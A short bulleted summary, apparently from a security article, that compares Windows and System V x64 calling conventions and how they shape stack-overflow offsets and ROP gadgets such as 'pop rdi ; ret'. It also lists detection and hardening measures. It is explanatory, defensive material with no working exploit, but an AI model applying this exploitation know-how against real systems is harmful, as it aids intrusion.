  • The two 64-bit ABIs differ in argument registers (RCX,RDX,R8,R9 vs. RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
  • Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required — pop rdi ; ret on Linux, shadow-space accounting on Windows.
  • Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688, hardened with canaries, CFG, and CET shadow stacks.
